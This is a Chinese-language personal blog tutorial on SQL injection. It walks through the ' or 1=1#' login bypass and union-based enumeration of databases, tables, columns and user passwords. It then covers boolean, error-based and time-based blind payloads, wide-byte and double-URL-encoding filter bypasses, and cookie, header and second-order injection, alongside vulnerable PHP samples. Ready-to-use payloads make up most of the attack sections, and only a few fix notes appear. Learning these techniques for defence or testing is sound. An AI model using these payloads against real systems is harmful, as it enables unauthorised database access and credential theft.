<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>SQL注入 | iatk&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="SQL注入漏洞原理：①有一个参数用户可控；②服务器对该参数没有过滤或者过滤不严谨。漏洞本质：将用户提交的数据当做代码执行，违背了“数据和代码分离”的原则。 万能密码原理后台登陆语句为：SELECT * FROM admin WHERE Username = &amp;#39;user&amp;#39; and Password = &amp;#39;pass&amp;#39;由于只要结果不为空就返回真，也就是登陆成功。因此，输入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="https://iatk.github.io/2019/04/12/SQL注入/index.html">
<meta property="og:site_name" content="iatk&#39;s blog">
<meta property="og:description" content="SQL注入漏洞原理：①有一个参数用户可控；②服务器对该参数没有过滤或者过滤不严谨。漏洞本质：将用户提交的数据当做代码执行，违背了“数据和代码分离”的原则。 万能密码原理后台登陆语句为：SELECT * FROM admin WHERE Username = &amp;#39;user&amp;#39; and Password = &amp;#39;pass&amp;#39;由于只要结果不为空就返回真，也就是登陆成功。因此，输入">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-04-28T01:02:47.336Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入">
<meta name="twitter:description" content="SQL注入漏洞原理：①有一个参数用户可控；②服务器对该参数没有过滤或者过滤不严谨。漏洞本质：将用户提交的数据当做代码执行，违背了“数据和代码分离”的原则。 万能密码原理后台登陆语句为：SELECT * FROM admin WHERE Username = &amp;#39;user&amp;#39; and Password = &amp;#39;pass&amp;#39;由于只要结果不为空就返回真，也就是登陆成功。因此，输入">
  
    <link rel="alternative" href="/atom.xml" title="iatk&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/bg.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">iatk</a></h1>
        </hgroup>

        
        <p class="header-subtitle">我的第一个博客</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/Home">博客首页</a></li>
                        
                            <li><a href="/works">作品展示</a></li>
                        
                            <li><a href="/about">留言打卡</a></li>
                        
                            <li><a href="/FrontEndGuide">前端导航</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=PAkNDgsKBQ4MCnxNTRJfU1E" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/luuman" title="github">github</a>
                            
                                <a class="fl zhihu" target="_blank" href="#" title="zhihu">zhihu</a>
                            
                                <a class="fl weibo" target="_blank" href="#" title="weibo">weibo</a>
                            
                                <a class="fl google" target="_blank" href="#" title="google">google</a>
                            
                                <a class="fl twitter" target="_blank" href="#" title="twitter">twitter</a>
                            
                                <a class="fl linkedin" target="_blank" href="#" title="linkedin">linkedin</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://luuman.github.io/">name</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">iatk</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/bg.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">iatk</a></h1>
            </hgroup>
            
            <p class="header-subtitle">我的第一个博客</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/Home">博客首页</a></li>
                
                    <li><a href="/works">作品展示</a></li>
                
                    <li><a href="/about">留言打卡</a></li>
                
                    <li><a href="/FrontEndGuide">前端导航</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=PAkNDgsKBQ4MCnxNTRJfU1E" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/luuman" title="github">github</a>
                    
                        <a class="zhihu" target="_blank" href="#" title="zhihu">zhihu</a>
                    
                        <a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
                    
                        <a class="google" target="_blank" href="#" title="google">google</a>
                    
                        <a class="twitter" target="_blank" href="#" title="twitter">twitter</a>
                    
                        <a class="linkedin" target="_blank" href="#" title="linkedin">linkedin</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-SQL注入" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/04/12/SQL注入/" class="article-date">
      <time datetime="2019-04-12T00:30:16.000Z" itemprop="datePublished">2019-04-12</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      SQL注入
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h3 id="SQL注入漏洞原理："><a href="#SQL注入漏洞原理：" class="headerlink" title="SQL注入漏洞原理："></a>SQL注入漏洞原理：</h3><p>①有一个参数用户可控；<br>②服务器对该参数没有过滤或者过滤不严谨。<br>漏洞本质：将用户提交的数据当做代码执行，违背了“数据和代码分离”的原则。</p>
<h3 id="万能密码原理"><a href="#万能密码原理" class="headerlink" title="万能密码原理"></a>万能密码原理</h3><p>后台登陆语句为：<br><code>SELECT * FROM admin WHERE Username = &#39;user&#39; and Password = &#39;pass&#39;</code><br>由于只要结果不为空就返回真，也就是登陆成功。<br>因此，输入万能密码or 1=1#<br>构造后的语句拼接为：<br><code>SELECT * FROM admin WHERE Username = &#39;user&#39; or 1=1# and Password = &#39;pass&#39;</code><br>通过注释符#注释后面的语句，在or 1=1的基础结果为真恒成立</p>
<h3 id="注入分类"><a href="#注入分类" class="headerlink" title="注入分类"></a>注入分类</h3><p>根据请求方式不同可分为：<br>GET方式请求注入<br>POST方式请求注入<br>差别：是否需要抓包</p>
<p>根据SQL注入点的参数类型可分为：<br>整数型注入（int型）<br>字符型注入（char型）<br>根据反馈类型可分为以下常见几种：<br>基于显错<br>union类型<br>布尔类型<br>基于时间<br>根据是否回显：<br>显注：有回显，有报错，通常使用union联合查询<br>盲注：无回显或只有显示正常页面和不显示页面两种区别，内置结果要么输出，要么不输出，不会输出其他内容</p>
<h4 id="盲注分为："><a href="#盲注分为：" class="headerlink" title="盲注分为："></a>盲注分为：</h4><p>布尔型bool<br>报错型error<br>时间型time<br>常用函数<br>concat()<br>用于将多个字符串连接成一个字符串<br><code>SELECT CONCAT(&#39;My&#39;,&#39;S&#39;,&#39;QL&#39;) group_concat()</code><br>将group by产生的同一个分组中的值连接起来，返回一个字符串结果<br><code>group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator &#39;分隔符&#39;] )</code><br>concat_ws()<br>第一个参数为分隔符，将从第二个开始的字符拼接起来，并用第一个参数分隔符隔开：<br><code>concat_ws(separator, str1, str2,...)</code></p>
<h3 id="注入基本流程"><a href="#注入基本流程" class="headerlink" title="注入基本流程"></a>注入基本流程</h3><p>判断是否有注入</p>
<p>获取数据库信息</p>
<p>获取数据库基本信息<br>获取数据库名<br>获取表名<br>获取列名<br>获取用户数据</p>
<p>破解数据</p>
<p>提升权限</p>
<p>内网渗透</p>
<h3 id="注入操作"><a href="#注入操作" class="headerlink" title="注入操作"></a>注入操作</h3><p>Union注入<br>判断是否存在注入</p>
<p>and 1=1<br>and 1=2<br>都有或都没输出，说明此处不存在注入</p>
<p>判断有多少列<br>使用二分法<br><code>order by n</code></p>
<p>判断数据显示点<br><code>union select 1,2,3,N</code></p>
<p>查看数据库、用户基本信息<br><code>union select 1,user(),version(),database()</code></p>
<p>查询有哪些数据库，获取数据库名<br><code>union select 1,group_concat(schema_name),2,3...... from information_schema.schemata</code></p>
<p>查询想要的数据中有哪些表，获取数据库中表名<br><code>union select 1,group_concat(table_name),2,3...... from information_schema.tables where table_schema=&#39;test&#39;</code></p>
<p>查询想要的数据中有哪些列，获取数据库表中列名<br><code>union select 1,group_concat(column_name),2,3...... from information_schema.columns where table_schema=&#39;test&#39; and table_name=&#39;users&#39;</code></p>
<p>得到想要信息：<br><code>union select user,password from test.users</code></p>
<p>information_schema库中重点关注以下三个表：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">schemata </span><br><span class="line">tables </span><br><span class="line">columns</span><br></pre></td></tr></table></figure></p>
<h3 id="BOOL型盲注"><a href="#BOOL型盲注" class="headerlink" title="BOOL型盲注"></a>BOOL型盲注</h3><p>and or not &gt; = &lt;<br>返回结果非true即false<br>以下均使用二分法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">得到数据库名长度</span><br><span class="line">and (length(database()))&gt;5</span><br><span class="line">and (length(database()))=4</span><br><span class="line">改变n的值依次获取数据库名的十进制ASCII值</span><br><span class="line">and (ascii(substr(database(),n,1)))&gt;100</span><br><span class="line">获取数据库表名（先获取表名数量，再获取表名长度）</span><br><span class="line">and (select count(*) from information_schema.tables where table_schema=database())&gt;5</span><br><span class="line">and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)&gt;5</span><br><span class="line">and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))&gt;100</span><br><span class="line">获取列名（先获取列名个数，再获取列名长度，最后获取列名）</span><br><span class="line">and (ascii(substr((select column_name from information_schema.columns where table_name=&apos;users&apos; limit 0,1),1,1)))&gt;100</span><br><span class="line">获取数据</span><br><span class="line">and (ascii(substr((select password from users limit 0,1)1,1)))=68</span><br></pre></td></tr></table></figure>
<h3 id="盲注之报错注入"><a href="#盲注之报错注入" class="headerlink" title="盲注之报错注入"></a>盲注之报错注入</h3><p>原理<br>盲注：没有明显提示<br>报错注入：使语句出错，利用语法错误实现目的<br>必要条件：源代码会输出错误内容，如mysql_error()，还必须运行使用xml模块</p>
<p>常用函数与用法：<br>其他常用方法补充：十种MySQL报错注入</p>
<p>floor()<br><code>and (select 1 from(select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)</code><br>查询结果至少存在三条才会触发报错，详见floor报错分析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">extractvalue()</span><br><span class="line">extractvalue(&apos;hello&apos;, ./test.xml);  // 报错最大长度32位</span><br><span class="line">and (extractvalue(1,concat(0x7e,(select user()),0x7e)))</span><br><span class="line">and extractvalue(&apos;hello&apos;,concat(&apos;~&apos;,substr((select group_concat(schema_name) from information_schema.schemata),1,32)))  // 优化</span><br></pre></td></tr></table></figure>
<p>若路径出现一些特殊字符如~，触发报错，将包括特殊字符在内的后面内容报出<br>updatexml()<br><code>and (updatexml(1,concat(0x7e,(select user()),0x7e),1))</code>// </p>
<p>报错最大长度32位，优化同上</p>
<h3 id="盲注之时间注入"><a href="#盲注之时间注入" class="headerlink" title="盲注之时间注入"></a>盲注之时间注入</h3><p>原理<br>配合其它注入法，如bool注入。<br>无论是否有结果，sql语句只要执行了，就可根据页面响应时长，判断语句是否被执行</p>
<p>函数<br>sleep()，benchmark()<br>基本用法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select if(1=1,sleep(2),sleep(5))</span><br><span class="line">select if(1=1,benchmark(2000000,md5(&apos;a&apos;)),benchmark(5000000,md5(&apos;a&apos;)))</span><br><span class="line">例子：</span><br><span class="line">and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101,sleep(1),sleep(5))</span><br></pre></td></tr></table></figure></p>
<h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p>原理<br>在使用PHP连接MySQL时，当设置set character_set_client=gbk时会导致一个编码转换注入的问题，即宽字节注入。</p>
<p>GBK编码<br>是对GB2312编码的扩展。采用双字节编码方案，编码范围：<br>8140~FEFE<br>编码表</p>
<p>后台使用了过滤函数，如：</p>
<p>addslashes() 对’，”，\和NULL（NULL字符）进行处理<br>mysql_real_escape_string() 过滤\x00，\n，\r，\，’，”，\x1a<br>mysql_escape_string() php5.3已弃用，与完全一样，除了 mysql_real_escape_string() 接受的是一个连接句柄并根据当前字符集转移字符串之外。mysql_escape_string() 并不接受连接参数，也不管当前字符集设定。</p>
<p>漏洞利用<br>当存在此漏洞时，在注入的参数里加入%df%27，即可把程序中过滤的\（即%5c）“吃掉”，%df%5c拼接为gbk编码的“運”<br>例如：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/1.php?id=1%27 and 1=1%23  # 失败的注入语句</span><br><span class="line">SELECT * FROM news WHERE id=&apos;1\&apos; and 1=1#&apos;  #过滤后后台实际执行语句</span><br><span class="line"></span><br><span class="line">/1.php?id=1%df%27 and 1%23  # 成功的注入语句</span><br><span class="line">SELECT * FROM news WHERE id=&apos;1運&apos; and 1#&apos;  # 后台实际执行语句</span><br></pre></td></tr></table></figure></p>
<p>修复方式<br>若是为了避免宽字节注入的产生，可限定使用mysql_set_charset(GBK)来指定字符集，并且使用mysql_real_escape_string进行转义</p>
<h3 id="二次编码注入"><a href="#二次编码注入" class="headerlink" title="二次编码注入"></a>二次编码注入</h3><p>url编码是一种浏览器用来打包表单输入的格式。url编码就是一个字符ascii码的十六进制，前面还需加上%<br>例如\的ascii码是92，92的十六进制是5c，所以\的url编码就是%5c</p>
<p>原理<br>Web程序中使用了urldecode()或rawurldecode()来解码id参数<br>提交参数到WebServer时，WebServer会自动解码生成单引号而引发注入</p>
<p>漏洞利用<br>%25被解码后被转换为%<br><code>/1.php?id=1%2527</code>  // URL中语句<br>id=1%27  // 实际执行语句，产生单引号成功闭合</p>
<h3 id="HTTP请求头注入"><a href="#HTTP请求头注入" class="headerlink" title="HTTP请求头注入"></a>HTTP请求头注入</h3><p>请求头定义<br>HTTP客户端（例如浏览器），向服务器发送请求时必须指明请求类型（一般为GET或者POST）。如有必要，客户程序还可以选择发送其它请求头。</p>
<p>常见请求头<br>User-agent 浏览器版本信息</p>
<p><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36</code></p>
<p>referer 包含一个URL，指明用户从该URL代表的页面出发访问当前请求的页面</p>
<p><a href="https://www.google.co.jp" target="_blank" rel="noopener">https://www.google.co.jp</a></p>
<p>X-Forwarded-For 即XFF，用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。</p>
<p>192.168.0.2</p>
<p>Cookie 总是保存在客户端中，一般会以文件的方式存储在硬盘中，我们通过一些插件可以修改Cookie内容</p>
<p><code>user:admin_12536223782183</code></p>
<h3 id="常用工具"><a href="#常用工具" class="headerlink" title="常用工具"></a>常用工具</h3><p>常用操作http请求头的工具<br>Burpsuite 抓包修改请求头<br>Chrome 扩展ModeHeader<br>FireFox 扩展Header Editor</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>常见处理user-agent方法：</p>
<p>user-agent很少会带入到数据库中进行处理，一般被用来判断客户端类型<br>例如： PHP使用jenssegers/agent库处理，判断是PC、移动端或者机器</p>
<p>常见处理referer方法：</p>
<p>referer很少会带入数据库中，它主要功能是用来验证请求来源<br>用来防御csrf漏洞</p>
<p>常见处理Cookie方法：</p>
<p>Cookie主要用来存储用户的认证信息，经常会带入到数据库中进行查询<br>在老旧的站点中，会直接将用户信息存储在cookie中，如果使用时直接带入数据库中进行查询，就可能出现SQL注入问题</p>
<p>后端PHP处理Cookie<br>验证账户信息，为客户端设置Cookie的示例代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$sql = &quot;SELECT * FROM `users` WHERE `username` = &apos;&#123;$username&#125;&apos;&quot;;</span><br><span class="line">$data = mysql_query($sql, $conn) or die(mysql_error());</span><br><span class="line">$userinfo = mysql_fetch_array($data);</span><br><span class="line">if(md5($password) == $userinfo[&apos;password&apos;]) &#123;</span><br><span class="line">    setcookie(&apos;usre&apos;, $userinfo[&apos;username&apos;], time() + 3600);</span><br><span class="line">    setcookie(&apos;background&apos;, $userinfo[&apos;background&apos;], time() + 3600);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>在进行敏感操作时，验证并使用cookie中的用户信息：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">if(!isset($_COOKIE[&apos;user&apos;])) &#123;</span><br><span class="line">	header(&quot;Location: login.php&quot;);</span><br><span class="line">	die();</span><br><span class="line">&#125;</span><br><span class="line">$sql = &quot;SELECT * FROM `messages` WHERE `author` = &apos;&#123;$_COOKIE[&apos;user&apos;]&#125;&apos;;&quot;;</span><br><span class="line">$data = mysql_query($sql, $conn) or die(mysql_error());</span><br><span class="line">while ($com = mysql_fetch_array($data)) &#123;</span><br><span class="line">    $message = $com[&apos;message&apos;];</span><br><span class="line">    $title = $com[&apos;title&apos;];</span><br><span class="line">    $id = $com[&apos;id&apos;];</span><br><span class="line">    echo &quot;&lt;h3&gt;标题： &lt;a href=&apos;index.php?id=&#123;$id&#125;&apos;&gt;&#123;$title&#125;&lt;/a&gt;&lt;/h1&gt;&lt;/h3&gt;&quot;;</span><br><span class="line">    echo &quot;&lt;a href=&apos;del.php?id=&#123;$id&#125;&apos;&gt;删除消息&lt;/a&gt;&lt;br /&gt;&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>Cookie中的用户信息直接带入到数据库中，可以直接进行注入攻击</p>
<p><code>Cookie: user=zs&#39; and 1--|</code></p>
<h3 id="常见处理X-Forwarded-For方法"><a href="#常见处理X-Forwarded-For方法" class="headerlink" title="常见处理X-Forwarded-For方法"></a>常见处理X-Forwarded-For方法</h3><p>调用函数后，获取结果，直接带入数据库中进行更新操作<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">if(md5($password) == $userinfo[&apos;password&apos;]) &#123;</span><br><span class="line">    setcookie(&apos;user&apos;, $userinfo[&apos;username&apos;], time() + 3600);</span><br><span class="line">    setcookie(&apos;background&apos;, $userinfo[&apos;background&apos;], time() + 3600);</span><br><span class="line">    setcookie(&apos;lastip&apos;, $userinfo[&apos;lastip&apos;], time() + 3600);</span><br><span class="line">    $sql = &quot;UPDATE `user` SET `lastip` = &apos;&#123;$realip&#125;&apos; WHERE `username` = &apos;&#123;$username&#125;&apos;&quot;;</span><br><span class="line">    mysql_query($sql, $conn) or die(mysql_error());</span><br><span class="line">    header(&quot;Location: add.php&quot;);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    echo &apos;&lt;script language=&quot;JavaScript&quot; type=&quot;text/javascript&quot;&gt;alert(&quot;你的用户名或密码错误&quot;);&lt;/script&gt;&apos;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h3 id="二阶注入"><a href="#二阶注入" class="headerlink" title="二阶注入"></a>二阶注入</h3><p>定义<br>为了预防SQL注入攻击，而将输入到应用程序中的某些数据进行了“转义（escape）”，但是这些数据却又在“未被转义（Unescaped）”的查询窗体中重复使用。此时，攻击者可能注入的是一个PAYLOAD，这样就会构成一个SQL查询语句并被执行，这就是所谓的二阶SQL注入。</p>
<p>原理<br>Second-order SQL injection<br>当用户提供的数据由应用程序存储并随后以不安全的方式合并到SQL查询中时，会出现二阶SQL注入。要检测漏洞，通常需要在一个位置提交合适的数据，然后使用其他一些以不安全的方式处理数据的应用程序功能</p>
<p>特点<br>普通注入</p>
<p>在http后面构造语句，是立即直接生效的<br>一次注入很容易被扫描工具扫描到<br>二阶注入</p>
<p>先构造语句（有被转义字符的语句）<br>我们构造的恶意语句存入数据库<br>第二次构造语句（结合前面已经存入数据库的语句，成功。因为系统没有对已经存入数据库的数据做检查）<br>二次注入更加难以被发现<br>利用方式<br>攻击者在http请求中提交恶意输入<br>恶意输入保存在数据库中<br>攻击者提交第二次http请求<br>为处理第二次http请求，程序在检索存储在数据库中的恶意输入，构造SQL语句<br>若攻击成功，在第二次请求相应中返回结果<br>代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">reg $uname = addslashes($_POST[&apos;uname&apos;]);</span><br><span class="line">INSERT INTO `users` (`uname`,`upass`) VALUES ($uname, md5($upass));</span><br><span class="line">login $uname = addslashes($_POST[&apos;uname&apos;]);</span><br><span class="line">SELECT * FROM `users` WHERE `uname` = $uname;</span><br><span class="line">show message $_SESSION[&apos;uname&apos;] = $db[&apos;uname&apos;];</span><br><span class="line">SELECT * FROM `messages` WHERE &apos;uname&apos; = &apos;$_SESSION[&quot;uname&quot;]&apos;;</span><br><span class="line">uname = admin&apos; and sleep(5);</span><br></pre></td></tr></table></figure></p>

      
      
        <div class="page-reward">
          <p><a href="javascript:void(0)" onclick="dashangToggle()" class="dashang">赏</a></p>
          <div class="hide_box"></div>
          <div class="shang_box">
            <a class="shang_close" href="javascript:void(0)" onclick="dashangToggle()">×</a>
            <div class="shang_tit">
              <p>纯属好玩</p>
            </div>
            <div class="shang_payimg">
              <img src="/img/alipayimg.jpg" alt="扫码支持" title="扫一扫">
            </div>
              <div class="pay_explain">扫码打赏，你说多少就多少</div>
            <div class="shang_payselect">
              
                <div class="pay_item checked" data-id="alipay">
                  <span class="radiobox"></span>
                  <span class="pay_logo"><img src="/img/alipay.png" alt="支付宝"></span>
                </div>
              
              
                <div class="pay_item" data-id="wechat">
                  <span class="radiobox"></span>
                  <span class="pay_logo"><img src="/img/weixin.png" alt="微信"></span>
                </div>
              
            </div>
            <div class="shang_info">
              <p>打开<span id="shang_pay_txt">支付宝</span>扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
        </div>
        <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/zepto/1.2.0/zepto.min.js"></script>
        <script type="text/javascript">
          $(".pay_item").click(function(){
            $(this).addClass('checked').siblings('.pay_item').removeClass('checked');
            var dataid=$(this).attr('data-id');
            $(".shang_payimg img").attr("src","/img/"+dataid+"img.jpg");
            $("#shang_pay_txt").text(dataid=="alipay"?"支付宝":"微信");
          });
          function dashangToggle(){
            
            $(".hide_box").fadeToggle();
            $(".shang_box").fadeToggle();
          }
        </script>
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/04/12/SQL注入/">SQL注入</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 iatk 的个人博客">iatk</a></p>
        <p><span>发布时间:</span>2019年04月12日 - 08时30分</p>
        <p><span>最后更新:</span>2019年04月28日 - 09时02分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/04/12/SQL注入/" title="SQL注入">https://iatk.github.io/2019/04/12/SQL注入/</a>
            <span class="copy-path" data-clipboard-text="原文: https://iatk.github.io/2019/04/12/SQL注入/　　作者: iatk" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2019/04/13/python2与python3在Windows中共存/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          python2与python3在Windows中共存
        
      </div>
    </a>
  
  
    <a href="/2019/04/10/CMD常用命令/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">CMD常用命令</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL注入漏洞原理："><span class="toc-number">1.</span> <span class="toc-text">SQL注入漏洞原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#万能密码原理"><span class="toc-number">2.</span> <span class="toc-text">万能密码原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注入分类"><span class="toc-number">3.</span> <span class="toc-text">注入分类</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#盲注分为："><span class="toc-number">3.1.</span> <span class="toc-text">盲注分为：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注入基本流程"><span class="toc-number">4.</span> <span class="toc-text">注入基本流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注入操作"><span class="toc-number">5.</span> <span class="toc-text">注入操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#BOOL型盲注"><span class="toc-number">6.</span> <span class="toc-text">BOOL型盲注</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#盲注之报错注入"><span class="toc-number">7.</span> <span class="toc-text">盲注之报错注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#盲注之时间注入"><span class="toc-number">8.</span> <span class="toc-text">盲注之时间注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#宽字节注入"><span class="toc-number">9.</span> <span class="toc-text">宽字节注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#二次编码注入"><span class="toc-number">10.</span> <span class="toc-text">二次编码注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP请求头注入"><span class="toc-number">11.</span> <span class="toc-text">HTTP请求头注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#常用工具"><span class="toc-number">12.</span> <span class="toc-text">常用工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#原理"><span class="toc-number">13.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a 